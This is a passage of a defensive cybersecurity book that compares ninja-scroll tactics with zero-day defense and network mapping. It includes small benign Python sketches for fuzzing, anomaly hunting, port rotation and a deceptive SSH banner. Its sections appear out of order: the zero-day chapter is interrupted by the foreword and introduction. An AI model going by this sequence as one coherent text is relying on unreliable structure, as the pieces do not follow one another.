and potential zero-days hidden in modern computing hardware, soft-

ware, clouds, and networks—all in the hope of provoking new insights.


Zero-Day

Few terms in the cybersecurity lexicon strike fear into the hearts of

defenders and knowledgeable business stakeholders like zero-day (or

0-day), an exploit or attack that was previously unknown and that defend-

ers may not know how to fight. The term comes from the fact that the

public has known about the attack or vulnerability for zero days. Because

victims and defenders have not had the opportunity to study the threat,

a threat actor with access to a zero-day that targets a common technol-

ogy almost always succeeds. For example, STUXNET used four zero-day

exploits to sabotage an air-gapped nuclear enrichment facility in Iran,

demonstrating the power of zero-days to attack even the most secure and

obscure targets.12

A zero-day attack derives its value from the fact that it is unknown.

As soon as a threat actor uses a zero-day, the victim has the chance to

capture evidence of the attack via sensors and monitoring systems, foren-

sically examine that evidence, and reverse engineer the attack. After the

zero-day appears in the wild, security professionals can quickly develop

mitigations, detection signatures, and patches, and they will publish CVE

numbers to alert the community. Not everyone pays attention to such

advisories or patches their systems, but the 0-day is increasingly less likely

to succeed as it becomes a 1-day, 2-day, and so on.

Zero-days are deployed in different ways depending on the

attacker’s motivations. Cybercriminals interested in a quick, lucrative

score might immediately burn a zero-day in a massive and highly vis-

ible attack that maximizes their immediate return. More advanced

threat actors establish procedures to delete artifacts, logs, and other

observable evidence of a zero-day attack, extending its useful life.

Truly sophisticated attackers reserve zero-days for hardened, valuable

targets, as zero-days that target popular technologies can sell for thou-

sands of dollars to cybercriminals on the black market—or more than

$1 million to governments eager to weaponize them or build a defense

against them.

While some zero-days come from legitimate, good-faith security

gaps in software code, threat actors can introduce zero-days into a soft-

ware application’s source code maliciously through agreements or covert

human plants. Targeted attacks can also compromise software libraries,

hardware, or compilers to introduce bugs, backdoors, and other hidden

vulnerabilities for future exploitation, in much the same way a ninja join-

ing a castle construction team might compromise the design by creating

secret entrances that only the ninja knows about (the scrolls tell us this

happened).13


Traditionally, zero-day discoveries have come from security research-

ers with deep expertise studying code, threat hunters thinking creatively

about vulnerabilities, or analysts accidentally discovering the exploit

being used against them in the wild. While these methods still work,

recent technologies such as “fuzzing” have helped automate zero-day

detection. Fuzzers and similar tools automatically try various inputs—

random, invalid, and unexpected—in an attempt to discover previously

unknown system vulnerabilities. The advent of AI-powered fuzzers and AI

defenders signals a new paradigm. Not unlike the way that the invention

of the cannon, which could pierce castle walls, led to new defense strate-

gies, AI offers the possibility that defenses may someday evolve almost

as quickly as the threats themselves. Of course, attack systems may also

learn how to overwhelm any defensive capability, altering not just how the

industry detects and fights zero-days but how the world looks at cyberse-

curity as a whole.
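To make the core mechanic concrete, here is a minimal sketch in Python of "dumb" random fuzzing. The parse_record function is a hypothetical stand-in for whatever code is under test; real fuzzers (coverage-guided mutation engines, for example) are far more sophisticated.

import random

def parse_record(data: bytes) -> None:
    # Hypothetical stand-in for the code under test.
    if data[:2] == b"\x13\x37" and len(data) > 64:
        raise ValueError("simulated parsing bug")

def fuzz(iterations: int = 10_000) -> None:
    for i in range(iterations):
        # Try random, invalid, and unexpected inputs.
        size = random.randrange(1, 512)
        payload = bytes(random.randrange(256) for _ in range(size))
        try:
            parse_record(payload)
        except Exception as exc:
            # Any unhandled crash is a candidate vulnerability to triage.
            print(f"iteration {i}: {len(payload)}-byte input crashed: {exc!r}")

fuzz()

Even this crude loop illustrates why fuzzing scales: the machine tries thousands of hostile inputs that no human tester would think to write.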

For now, though, the pattern of exploit and discovery is cyclical.

Threat actors become familiar with a subset of exploits and vulnerabili-

ties, such as SQL injection, XSS, or memory leaks. As defenders become

familiar with combatting those threats, attackers move to exploiting

different techniques and technologies, and the cycle continues. As time

goes by and these defenders and attackers leave the workforce, we will

likely observe a new generation of threat actors rediscovering the same

common weaknesses in new software and technologies, resulting in the

reemergence of old zero-days—the cycle will begin anew.

Zero-Day Defense

Zero-day detection and protection are often the go-to claim for new

entrants to the cybersecurity market, as they like to promise big results

from their solution. That isn’t to say none of them work. However, this topic

can easily fall into snake-oil territory. Rest assured that I am not trying to

sell you anything but practical guidance on the threat, as detailed below.

The ninja scrolls were scripted in medieval times but carefully kept secret until the mid-20th

century. The scrolls were recently translated from Japanese to English. The


translation reveals just how ninjas were trained to think, strategize, and

act. Ninjas, being covert agents, cautiously kept their strategies and tactics

secret. But the revelations made through the publication of their scrolls

are worth a deep analysis to understand what made ninjas so successful in

their espionage, deception, and surprise attack missions over centuries.

Ben’s analysis of these scrolls gleans the strategies, tactics, and tech-

niques that ninjas used to conduct their attacks. He maps these ancient

tactics and techniques to the modern-day tactics, techniques, and proce-

dures (TTPs) used by hackers to conduct cyberattacks. Reading through

the playbook and procedures will help security professionals understand

not only how a ninja thinks, but also how a cybercriminal thinks. With

that understanding, you will be able to develop the craft of really think-

ing like a hacker and internalizing that security principle. Not only will

that help you predict the hacker’s potential next move, but it will also give

you time to prepare for that move and build up your defenses to prevent

the hacker from reaching their goal.

Ben's use of the ninja scrolls to bring these TTPs closer to

cyberdefenders is also a smart approach because these scrolls

deal with attacks in the physical world; that is, they reference physical

objects and describe movements within a physical environment. Physical

environments are much easier for our brains to visualize than cyber or

virtual environments. Thinking about the hacker’s tactics and techniques

as they relate to tangible assets makes them more discernible. You can

start envisaging how a hacker might apply a particular TTP to compro-

mise one asset or move from one asset to another. In each chapter, Ben

brilliantly takes you through a castle theory thought exercise to help you

visualize those movements in a medieval castle and then translate them

to a cyber environment.

Readers will greatly benefit from the wealth of tips and strategies

Ben lays out. This is a timely contribution: cybersecurity is becoming one

of the main pillars of our economy. Ben McCarty, with his decade-long

threat intelligence experience, is exceptionally well positioned to share

the practical tips of how to think like a ninja and a hacker in order to pro-

tect both your information and the digital economy at large.

Malek Ben Salem, PhD

Security R&D Lead

Accenture

A C K N O W L E D G M E N T S

I must start by thanking my lovely Sarah. From reading early drafts to giv-

ing me advice on the cover and providing me with the freedom to write a

book, thank you so much.

To Chris St. Myers, thank you for keeping me engaged and happy under

your leadership while I was conducting deep threat intelligence research

into cyber espionage. The experience was essential for me to saliently cap-

ture the minds of cyber espionage threat actors. You never stopped me; you

only encouraged me and taught me many things along the way.

I’m eternally grateful to the US Army TRADOC cadre and DET-

MEADE, who recognized my potential and placed me into the first cyber-

warfare class and unit. This unique experience was especially formative for

my understanding of cybersecurity and operator tradecraft.

A very special thanks to Antony Cummins and his team for translating

the ninja scrolls and making them available to the English-speaking world.

It is because of your efforts and infectious passion for the ninja that I found

the inspiration to write this book.

To everyone at No Starch Press who helped improve the manuscript

and make it into a book I am proud of, thank you.

Finally, thank you to all those who have been a part of my cybersecurity

journey. Learning from other cybersecurity professionals has been a plea-

sure and has greatly enriched my overall knowledge and understanding of

cybersecurity and threats. I needed every bit of it to write this book.

I N T R O D U C T I O N

First and foremost: I am not a ninja. Nor am I a ninja

historian, a sensei, or even Japanese.

However, I did perform cyber warfare for the US Army, where my fel-

low soldiers often described our mission as “high-speed ninja sh*t.” That’s

when I really started noticing the odd prevalence of “ninja” references in

cybersecurity. I wanted to see if there was anything substantive behind the

term’s use. I started researching ninjas in 2012, and that’s when I found

recent English translations of Japanese scrolls written more than 400 years

ago (more on those in the “About This Book” section that follows). These

scrolls were the training manuals that ninjas used to learn their craft—not

historical reports but the actual playbooks. One of these, Bansenshūkai, was

declassified by the Japanese government and made available to the public

on a limited basis only after World War II, as the information had been

considered too dangerous to disseminate for almost 300 years. In medieval

times, non-ninjas were never supposed to see these documents. Bold warn-

ings in the scrolls inform readers to protect the information with their lives.

At one time, simply possessing such a scroll was enough to merit execution

in Japan. The taboo nature of the material added an undeniable mystique

to the reading experience. I was hooked.

After reading more than 1,000 pages of translated source material, it

became clear that the instructions and secret techniques meant for ninjas

were essentially on-the-ground training in information assurance, secu-

rity, infiltration, espionage, and destructive attacks that relied on covert

access to heavily fortified organizations—many of the same concepts

I dealt with every day of my career in cybersecurity. These 400-year-old

manuals were filled with insights about defensive and offensive security

for which I could not find equivalents in modern information assurance

practices. And because they were field guides that laid bare the tactics,

techniques, and procedures (TTPs) of secret warfare, they were truly

unique. In our business, nation-state cyber espionage units and other

malicious actors do not hold webinars or publish playbooks that describe

their TTPs. Thus, these ninja scrolls are singular and invaluable.

Cyberjutsu aims to turn the tactics, techniques, strategies, and

mentalities of ancient ninjas into a practical cybersecurity field guide.

Cybersecurity is relatively young and still highly reactionary. Industry pro-

fessionals often spend their days defusing imminent threats or forecasting

future attacks based on what just happened. I wrote this book because I

believe we have much to learn by taking a long view offered in these scrolls

of information security’s first advanced persistent threat (APT). The infor-

mation warfare TTPs practiced by ancient ninjas were perfected over hun-

dreds of years. The TTPs worked in their time—and they could be the key

to leapfrogging today's prevailing cybersecurity models, best practices, and

concepts to implement more mature and time-tested ideas.

About This Book

Each chapter examines one ninja-related topic in detail, moving from

a broad grounding in history and philosophy to analysis to actionable

cybersecurity recommendations. For ease of use, each chapter is orga-

nized as follows:

The Ninja Scrolls A brief introduction to a tool, technique, or

methodology used by ninjas.

Cybersecurity An analysis of what the ninja concept teaches us

about the current cybersecurity landscape.

What You Can Do Actionable steps, derived from the preceding

analysis, that you can take to secure your organization against cyber

threats.

Castle Theory Thought Exercise An exercise that asks you to solve

a threat scenario using what you’ve learned about ninja and cyber

concepts.


1. Follow best practices. Just because zero-days are maddeningly dif-

ficult to defend against does not mean that you should give up on

security. Follow industry best practices. While they may not fully

neutralize zero-days, they do make it harder for threat actors to

conduct activities against your environment, and they give your

organization a better chance to detect and respond to zero-day

attacks. Rather than idly worrying about potential zero-days,

patch and mitigate 1-days, 2-days, 3-days, and so on, to minimize

the time your organization remains vulnerable to known attacks.


2. Use hunt teams and blue teams. Form or contract a hunt team and a

blue team to work on zero-day defense strategies.

The hunt team comprises specialized defenders who do not

rely on standard signature-based defenses. Instead, they constantly

develop hypotheses about how adversaries could use zero-days or

other methods to infiltrate networks. Based on those hypotheses,

they hunt using honeypots, behavioral and statistical analysis, pre-

dictive threat intelligence, and other customized techniques (a minimal sketch follows this item).

The blue team comprises specialized defenders who design,

test, and implement real defenses. First, they document the infor-

mation flow of a system or network, and then they build threat

models describing real and imagined attacks that could succeed

against the current design. Unlike with the hunt team, it is not

the blue team’s job to find zero-days. Instead, they evaluate their

information and threat models in terms of zero-days to deter-

mine how they could effectively mitigate, safeguard, harden, and

protect their systems. The blue team exists apart from normal

security, operations, and incident response personnel, though

the team should review existing incident response reports to

determine how defenses failed and how to build proactive

defenses against similar future attacks.
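As one small illustration of the hunt team's behavioral and statistical analysis, the following Python sketch flags hosts whose daily outbound connection counts spike far above their own baseline. The hostnames and numbers are invented for illustration; a real hunt team would feed this from logs or network flow data.

from statistics import mean, stdev

# Hypothetical per-host history of daily outbound connection counts.
history = {
    "ws-accounting-07": [112, 98, 120, 105, 99, 101, 1450],
    "ws-hr-03": [80, 85, 79, 90, 88, 84, 86],
}

for host, counts in history.items():
    baseline, today = counts[:-1], counts[-1]
    mu, sigma = mean(baseline), stdev(baseline)
    z = (today - mu) / sigma if sigma else 0.0
    if z > 3:  # more than three standard deviations above this host's normal
        print(f"hunt lead: {host} made {today} connections (baseline ~{mu:.0f})")

No signature fires here, because nothing matched a known exploit; the hunt lead comes purely from a host behaving unlike itself.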

3. Implement dynamic defenses . . . with caution. In recent years, security

professionals have made concerted efforts to introduce complex

and dynamic defense measures that:

• Attempt to make a network a moving target—for example,

nightly updates

• Introduce randomization—for example, address space layout

randomization (ASLR)

• Dynamically change on interaction—for example, quantum

cryptography

• Initiate erratic defense conditions or immune response

systems

Some of these dynamic defenses were quite successful initially,

but then adversaries developed ways to beat them, rendering

them effectively static from a strategic perspective.

Talk to cybersecurity vendors and practitioners and explore

the literature on state-of-the-art dynamic defenses to determine

what would work for your organization. Proceed with caution,

however, as today’s dynamic defense can become tomorrow’s

standard-issue, easily circumvented security layer.
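As a toy example of the moving-target idea, the sketch below derives a service's listening port from a shared secret and the date, so the service "moves" nightly and a scan result goes stale by morning. The secret, port range, and scheme are illustrative assumptions, not a vetted protocol, and, as noted above, the defense becomes effectively static the moment the scheme leaks.

import datetime
import hashlib

SECRET = b"rotate-me-out-of-band"  # known only to legitimate clients

def port_for(date: datetime.date) -> int:
    digest = hashlib.sha256(SECRET + date.isoformat().encode()).digest()
    # Map the hash into the high, unprivileged range 20000-64999.
    return 20000 + int.from_bytes(digest[:4], "big") % 45000

print("today's port:", port_for(datetime.date.today()))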


4. Build a more boring defense. Consider utilizing “boring” systems,

coding practices, and implementations in your environment

where possible. Started by Google’s BoringSSL open source proj-

ect,14 the boring defense proposes that simplifying and reducing

your code’s attack surface, size, dependency, and complexity—

making it boring—will likely eliminate high-value or critical

vulnerabilities. Under this practice—which can be effective on a

code, application, or system level—code is not elaborate or art-

ful but rather tediously secured and unvaried in structure, with

dull and simple implementations. In theory, making code easier

for humans and machines to read, test, and interpret makes it

less likely that unexpected inputs or events will unearth zero-day

vulnerabilities.
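The following sketch shows what "boring" looks like at the code level: a tediously explicit validator with no clever tricks, no dependencies, and a structure so dull it can be tested exhaustively. The function name and limits are illustrative.

def parse_port(text: str) -> int:
    # Reject anything that is not a plain base-10 integer.
    if not text.isdigit():
        raise ValueError("port must be decimal digits only")
    if len(text) > 5:
        raise ValueError("port field is too long")
    value = int(text)
    if not 1 <= value <= 65535:
        raise ValueError("port out of range")
    return value

There is nothing artful here, and that is the point: every branch is obvious to a reviewer, a tester, and a static analyzer alike.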

5. Practice denial and deception (D&D). D&D prevents adversaries

from obtaining information about your environment, systems,

network, people, data, and other observables, and it can deceive

them into taking actions that are advantageous to you. Making

adversaries’ reconnaissance, weaponization, and exploit delivery

harder forces them to spend more time testing, exploring, and

verifying that the gap they perceive in your environment truly

exists. For example, you could deceptively modify your systems to

advertise themselves as running a different OS with different soft-

ware, such as by changing a Solaris instance to look like a differ-

ent SELinux OS. (Ideally, you would actually migrate to SELinux,

but the logistics of legacy IT systems may keep your organization

reliant on old software for longer than desired.) If your decep-

tion is effective, adversaries may try to develop and deliver wea-

ponized attacks against your SELinux instance—which will, of

course, fail because you’re not actually running SELinux.

Note that D&D should be applied on top of good security

practices to enhance them rather than leveraged on its own to

achieve security through obscurity. D&D is a security endgame

for extremely mature organizations looking for additional ways to

defend systems from persistent threat actors, similar to the “hush-

hush tactics” described in Bansenshūkai.15
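As a minimal sketch of a single deceptive observable, the Python listener below answers any connection with a version banner for software you do not actually run; the port and banner string are illustrative choices, not a recommendation. Real deception platforms coordinate many such signals so the story stays consistent under scrutiny.

import socket

def fake_banner_listener(port: int = 2222) -> None:
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", port))
    srv.listen(5)
    while True:
        conn, peer = srv.accept()
        print("deception probe from", peer)  # every touch is a hunt lead
        conn.sendall(b"SSH-2.0-OpenSSH_7.4\r\n")  # misleading version string
        conn.close()

fake_banner_listener()

A useful side effect: because no legitimate user has any reason to connect, anything that touches the listener is, by definition, worth investigating.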

6. Disconnect to protect. In its discussion of the disconnect defense,

Shōninki teaches you to disconnect from the enemy mentally,

strategically, physically, and in every other way.16 In cybersecurity,

this means creating a self-exiled blue team that turns completely

inward, working in isolation from the world and ignoring all secu-

rity news, threat intelligence, patches, exploits, malware variations,


new signatures, cutting-edge products—anything that could influ-

ence their reason, alter their state of mind, or provide a connec-

tion with the enemy. If undertaken correctly, the disconnect skill

forks the defenders’ thinking in a direction far from the industry

standard. Adversaries have trouble thinking the same way as the

disconnected defenders, and the defenders develop unique, secret

defense strategies that the adversary has not encountered, making

it exceedingly difficult for zero-day attacks to work.

Like D&D, this method is recommended only if you already pos-

sess elite cybersecurity skills. Otherwise, it can be counterproduc-

tive to alienate yourself from the enemy and operate in the dark.

C A S T L E  T H E O R Y  T H O U G H T  E X E R C I S E

Consider the scenario in which you are the ruler of a medieval castle with valuable assets inside. You hear rumors that a shinobi infiltrated the construction crew when it was building your castle and installed one or more backdoors or other gaps in the castle's security. Shinobi who know the locations and mechanisms of these vulnerabilities can slip in and out of your castle freely, bypassing the guards and security controls. You have sent guards, architects, and even mercenary shinobi to inspect your castle for these hidden vulnerabilities, but they have found nothing. You do not have the money, time, or resources to build a new, backdoor-free castle.

How would you continue castle operations knowing that there is a hid-

den flaw a shinobi could exploit at any time? How will you safeguard the

treasure, people, and information inside your castle? How can you hunt for

or defend against a hidden weakness without knowing what it looks like,

where it is located, or how it is used? How else could you manage the risk of

this unknown vulnerability?

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated with

the concept of zero-days in mind.

1. Create custom, dynamic, and adaptive security protections

for your organization to fortify security best practices. [AC-2:

Account Management | (6) Dynamic Privilege Management;

AC-4: Information Flow Enforcement | (3) Dynamic Information


Flow Control; AC-16: Security and Privacy Attributes | (1)

Dynamic Attribute Association; IA-10: Adaptive Authentication;

IR-4: Incident Handling]

Recommended Security Controls and Mitigations A checklist of

recommended security settings and specifications, based on the

NIST 800-53 standard,1 that you can implement for compliance pur-

poses or to conform to best practices.


This book does not seek to provide a comprehensive catalogue of

ninja terminology or an extended discourse on ninja philosophy. For

that, seek out the work of Antony Cummins and Yoshie Minami, who

edited and translated Japan’s ancient ninja scrolls for a contemporary

audience. This book references the following Cummins and Minami titles

(for more details on each, see the section “A Ninja Primer” on page xxiv):

• The Book of Ninja (ISBN 9781780284934), a translation of the

Bansenshūkai

• The Secret Traditions of the Shinobi (ISBN 9781583944356), a trans-

lation of the Shinobi Hiden (or Ninpiden), Gunpo Jiyoshu, and

Yoshimori Hyakushu

• True Path of the Ninja (ISBN 9784805314395), a translation of

Shōninki

Cummins and Minami’s work is extensive, and I highly recommend

reading it in full. These collections serve not only as inspiration but as the

primary sources for this book’s analysis of ninjutsu, from military tactics

to how to think like a ninja. Their translations contain fascinating wis-

dom and knowledge beyond what I could touch on in this book, and they

are a thrilling window into a lost way of life. Cyberjutsu is greatly indebted

to Cummins and Minami and their tireless efforts to bring these medi-

eval works to the contemporary world.

A Note on the Castle Theory Thought Exercises

I believe that talking about issues in the cybersecurity industry comes

with at least three baked-in problems. First, even at security organiza-

tions, nontechnical decision makers or other stakeholders are often

excluded from, lied to about, or bullied out of cybersecurity conversa-

tions because they lack technical expertise. Second, many security prob-

lems are actually human problems. We already know how to implement

technical solutions to many threats, but human beings get in the way with

politics, ignorance, budget concerns, or other constraints. Lastly, the

availability of security solutions and/or answers that can be purchased

or easily discovered with internet searches has changed how people

approach problems.

To address these issues, in each chapter, I have presented the cen-

tral questions at the heart of the topic in the Castle Theory Thought

Exercise—a mental puzzle (which you hopefully can’t google) in which

you try to protect your castle (network) from the dangers posed by enemy

ninjas (cyber threat actors). Framing security problems in terms of defend-

ing a castle removes the technical aspects of the conversation and allows

for clearer communication on the crux of the issue and collaboration


between teams. Everyone can grasp the scenario in which a ninja physi-

cally infiltrates a castle, whether or not they can speak fluently about

enterprise networks and hackers. Pretending to be the ruler of a castle

also means you can ignore any organizational bureaucracy or political

problems that come with implementing your proposed solutions. After all,

kings and queens do what they want.

For Future Use

There are many cybersecurity ideas in this book. Some are lifted from

the original scrolls and adapted for modern information applications.

Others are proposed solutions to gaps I have identified in commercial

products or services. Still other ideas are more novel or aspirational. I am

not sure how the implementations would work on a technical level, but

perhaps someone with better perspective and insight can develop and

patent them.

If, by chance, you do patent an idea that stems from this book, please

consider adding my name as a co-inventor—not for financial purposes

but simply to document the origins of the idea. If you have questions

about this book or would like to discuss the ideas for practical applica-

tion, email me at ben.mccarty0@gmail.com.

A Ninja Primer

This brief primer is meant to help shift your notion of what a “ninja” is

to the reality depicted in historical evidence. Try to put aside what you

know about ninjas from movies and fiction. It’s natural to experience

some confusion, disbelief, and cognitive discomfort when confronting

evidence that contradicts long-held ideas and beliefs—especially for

those of us who grew up wanting to be a ninja.

The Historical Ninja

Ninja went by many names. The one we know in the 21st-century West is

ninja, but they were also called shinobi, yato, ninpei, suppa, kanja, rappa, and

ukami.2,3 The many labels speak to their reputation for being elusive and

mysterious, but really the profession is not hard to understand: shinobi

were elite spies and warriors for hire in ancient Japan. Recruited from

both the peasantry4 and the samurai class—notable examples include

Natori Masatake5 and Hattori Hanzō6—they likely existed in some form

for as long as Japan itself, but they don’t appear much in the historical

record until the 12th-century Genpei War.7 For centuries after, Japan

was beset by strife and bloodshed, during which feudal lords (daimyō8)

employed shinobi to conduct espionage, sabotage, assassination, and


warfare.9 Even the fifth-century BCE Chinese military strategist Sun Tzu’s

seminal treatise, The Art of War, stresses the necessity of using these covert

agents to achieve victory.10

The ninja were fiercely proficient in information espionage, infil-

tration of enemy encampments, and destructive attacks; shinobi were

perhaps history’s first advanced persistent threat (APT0, if you will).

During a time of constant conflict, they opportunistically honed and

matured their techniques, tactics, tools, tradecraft, and procedures,

along with their theory of practice, ninjutsu. The Bansenshūkai scroll

notes, “The deepest principle of ninjutsu is to avoid where the enemy

is attentive and strike where he is negligent.”11 So, operating as covert

agents, they traveled in disguise or by stealth to the target (such as a

castle or village); collected information; assessed gaps in the target’s

defense; and infiltrated to perform espionage, sabotage, arson, or

assassination.12

With the long, peaceful Edo period of the 17th century, the demand

for shinobi tradecraft dwindled, driving ninjas into obscurity.13 Though

their way of life became untenable and they took up other lines of

work, their methods were so impactful that even today, shinobi are

mythologized as some of history’s greatest warriors and information

warfare specialists, even being attributed fabulous abilities such as

invisibility.

The Ninja Scrolls

Shinobi knowledge was most likely passed from teacher to student,

between peers, and through a number of handbooks written by practic-

ing shinobi before and during the 17th century. These are the ninja

scrolls. It’s likely that families descended from shinobi possess other,

undisclosed scrolls that could reveal additional secret methods, but their

contents have either not been verified by historians or have not been

made available to the public. The historical texts we do have are key to

our understanding of shinobi, and reviewing these sources to derive

evidence-based knowledge helps avoid the mythology, unverified folk-

lore, and pop culture stereotypes that can quickly pollute the discourse

around ninjas.

Among the most significant ninja scrolls are:

The Bansenshūkai An encyclopedic, 23-volume collection of

ninja skills, tactics, and philosophy culled from multiple shinobi.

Compiled in 1676 by Fujibayashi, this scroll is an attempt to preserve

the skills and knowledge of ninjutsu in a time of extended peace.

It is also, essentially, a job application and demonstration of skills,


written by shinobi for the shogun class that might need their services

in a less peaceful future.

The Shinobi Hiden (or Ninpiden) A collection of scrolls believed to

have been written around 1655 and then passed down through the

Hattori Hanzō family until their eventual publication to the wider

world. Perhaps the most practical of the ninja manuals, these scrolls

reveal the techniques and tools shinobi used on the ground, includ-

ing diagrams and specifications for building weapons.

The Gunpo Jiyoshu (or Shiyoshu) A wide-ranging scroll that touches

on military strategy, governance, tools, philosophy, and wartime use

of shinobi. Believed to have been written by Ogasawara Saku’un in

1612, the Gunpo Jiyoshu also contains the Yoshimori Hyakushu, a col-

lection of 100 ninja poems designed to teach shinobi the skills and

wisdom necessary to succeed in their missions.

The Shōninki A training manual developed in 1681 by Natori

Sanjuro Masatake, a samurai and innovator of warfare. A highly lit-

erary text, the Shōninki was likely written for those who had already

become proficient in certain areas of physical and mental training

but who sought knowledge refreshers and greater insight into the

guiding principles and techniques of ninjutsu.

Ninja Philosophy

It is important to develop intellectual empathy with the values and mind-

set of the ninja, without delving into mysticism or spiritualism. I consider

the ninja philosophy to border on hacker-metacognition with undertones

of the yin-yang of Shinto-Buddhism enlightenment influence. While famil-

iarity with the underlying philosophy is not necessary for understanding

ninja tactics and techniques, learning from the wisdom that informs ninja

applications is certainly helpful.

The Heart [of/under] an Iron Blade

The Japanese word shinobi (忍) is made up of the kanji characters for

blade (刃) and heart (心). There are various ways to interpret its meaning.

One is that shinobi should have the heart of a blade, or make their

heart into a blade. A sword blade is sharp and strong, yet flexible—a tool

designed to kill humans while also acting as an extension of the user’s

spirit and will. This dovetails with the Japanese concept of kokoro, a com-

bination of one’s heart, spirit, and mind into one central essence. In this

context, the iconography provides insight into the balanced mindset nec-

essary for someone to assume the role of a ninja.


Another interpretation is of a “heart under a blade.” In this reading,

the blade is an existential threat. It is also not only the physical threat

that endangers a shinobi’s life but also a weapon that closely guards their

beating heart. The onyomi (Chinese) reading of 忍 is “to persist,” which

highlights the inner strength needed to work as a spy in enemy terri-

tory, under constant threat. The shinobi had to perform life-threatening

missions that sometimes meant remaining in the enemy’s territory for

extended periods before acting—that is, being an advanced persistent

threat.

The Correct Mind

Bansenshūkai declares that shinobi must have “the correct mind” or face

certain defeat. Achieving this rarified state means always being present,

focused, and conscious of purpose—it is mindfulness as self-defense.

Shinobi were expected to make decisions with “benevolence, righteous-

ness, loyalty, and fidelity”14 in mind, even though the result of their craft

was often conspiracy and deception. This philosophy had the benefit of

calming and focusing shinobi during moments of intense pressure, such

as combat or infiltration. “When you have inner peace,” Shōninki states,

“you can fathom things that other people don’t realize.”15

“The correct mind” was also believed to make shinobi more dynamic

strategists. While other warriors often rushed quickly and single-mindedly

into battle, the shinobi’s focus on mental acuity made them patient and

flexible. They were trained to think unconventionally, questioning every-

thing; historian Antony Cummins compares this kind of thinking to

contemporary entrepreneurial disrupters. If their weapons failed, they

used their words. If speech failed, they put aside their own ideas and chan-

neled their enemy’s thought processes.16 A clear mind was the gateway to

mastering their enemies, their environment, and seemingly impossible

physical tasks.

Shōninki puts it succinctly: “Nothing is as amazing as the human

mind.”17

Ninja Techniques

The infiltration techniques detailed in the ninja scrolls illustrate the

astonishing effectiveness of the shinobi’s information-gathering pro-

cesses. They practiced two primary modes of infiltration: in-nin (“ninjutsu

of darkness”) refers to sneaking somewhere under cover of darkness or

being otherwise hidden to avoid detection, while yo-nin (“ninjutsu of

light”) refers to infiltration in plain sight, such as disguising oneself as a


monk to avoid suspicion. Sometimes shinobi used one within the other—

for instance, they might infiltrate a town in disguise, then slip away and

hide in a castle’s moat until the time of attack.

Regardless of whether they used in-nin or yo-nin, shinobi set out to

know everything possible about their targets, and they had time-honed

methods for gathering the most detailed information available. They

studied the physical terrain of their target, but they also studied the local

people’s customs, attitudes, interests, and habits. Before attempting to

infiltrate a castle, they first conducted reconnaissance to determine the

size, location, and function of each room; the access points; the inhabit-

ants and their routines; and even their pets’ feeding schedules. They

memorized the names, titles, and job functions of enemy guards, then

used enemy flags, crests, and uniforms to sneak in openly (yo-nin) while

conversing with their unsuspecting targets. They collected seals from

various lords so they could be used in forgeries, often to issue false orders

to the enemy’s army. Before they engaged in battle, they researched the

opposing army’s size, strength, and capabilities along with their tenden-

cies in battle, their supply lines, and their morale. If their target was a

powerful lord, they sought to learn that ruler’s moral code and deepest

desires so that the target could be corrupted or played to.18

Shinobi were taught to think creatively via the “correct mind” phi-

losophy. That training made them hyperaware of the world around them

and spurred new ways of taking action in the field. For instance, the

Shōninki taught shinobi to be more effective by observing the behavior

of animals in nature. If a shinobi came to a roadblock or enemy check-

point, they thought like a fox or a wolf: they did not go over or through it;

they displayed patience and went around it, even if the bypass took many

miles. Other times, it was appropriate to let themselves be led “like cattle

and horses,”19 out in the open, perhaps posing as a messenger or emis-

sary to get close to the enemy, who was likely to overlook people of lower

classes. No matter how shinobi felt—even if they were white-hot with

anger—they worked to appear serene on the outside, “just as waterfowl

do on a calm lake.”20 If they needed to distract a guard from his post,

they could impersonate dogs by barking, howling, or shaking their kimo-

nos to imitate the sound of a dog’s shaking.21

Shinobi brought about battlefield innovations that armies and covert

operatives still practice to this day, and those methods were successful

because of how the shinobi’s tireless reconnaissance and impeccable

knowledge of their targets weaponized information and deception.

1

M A P P I N G N E T W O R K S

With these maps, the general can consider

how to defend and attack a castle.

For moving the camp, there is a set of principles to follow about

the time and the day of moving. The duty of a shinobi is to know

exactly the geography of the area and the distance to the enemy.

—Yoshimori Hyakushu #9

Once you get the details and layout of the castle or the

camp, all you need to do is get back with it as soon as possible,

as that is what a good shinobi should do.

—Yoshimori Hyakushu #24

The very first piece of advice offered in the Bansenshūkai’s

“A Guideline for Commanders” is to produce meticu-

lously accurate maps that your generals can use to plan

attacks against the enemy.1 Selected poems of the Yoshimori

Hyakushu2 also stress the importance of drawing and main-

taining maps with enough detail to be useful to both an

army and an individual shinobi.


Commanders usually tasked shinobi with creating maps. The scrolls

make clear that the skill of being able to accurately draw what you see—

mountains, rivers, fields—is not the same as drawing purposeful, con-

textualized threat intelligence maps to aid military strategy or shinobi

infiltration. The scrolls state that the following details are relevant to

the tactics of war and shinobi tradecraft and thus should be included

in maps:3

All entrances and gates of a house, castle, or fort. What types of

locks, latches, and opening mechanisms are present? How difficult is

it to open the gates or doors, and do they make noise when opened

or closed?

The approaching roads. Are they straight or curved? Wide or nar-

row? Dirt or stone? Flat or inclined?

The design, makeup, and layout of the structure. What is each

room’s size and purpose? What is kept in each room? Do the floor-

boards squeak?

The inhabitants of the structure. What are their names? Do they

practice any noteworthy skills or arts? How alert or suspicious is each

person?

The topology of the castle and surrounding area. Are signal relays

visible from inside and outside the location? Where are food, water,

and firewood stored? How wide and deep are the moats? How high

are the walls?

Understanding Network Maps

Network maps in cybersecurity are network topology graphs that describe

the physical and/or logical relationship and configuration between links

(communication connections) and nodes (devices) in the network. To

better understand the concept, consider road maps or maps in an atlas.

These describe physical locations, geographic features, political borders,

and the natural landscape. Information about roads (links)—their name,

orientation, length, and intersections with other roads—can be used

to navigate between different locations (nodes). Now let’s consider the

following hypothetical scenario.

Imagine you live in a world where roads and buildings spontaneously

appear or vanish in the blink of an eye. GPS exists, and you have the coor-

dinates of where you are and where you want to go, but you must try to get

there by following a bewildering network of constantly changing roads.


Fortunately, navigation officials (routers) are placed at every crossroads to

help travelers like you find their way. These routers are constantly calling

their neighboring routers to learn what routes and locations are open so

they can update their routing table, kept on a clipboard. You must stop

at every intersection and ask the router for directions to the next corner

by showing them your travel card, which has your intended destination

coded in GPS coordinates. The router checks their clipboard for cur-

rently open routes while making some calculations, quickly points you

in a direction, stamps your travel card with the router’s address, hole-

punches your travel card to track the number of routers you have checked

in with on your journey, and sends you off to the next router. You repeat

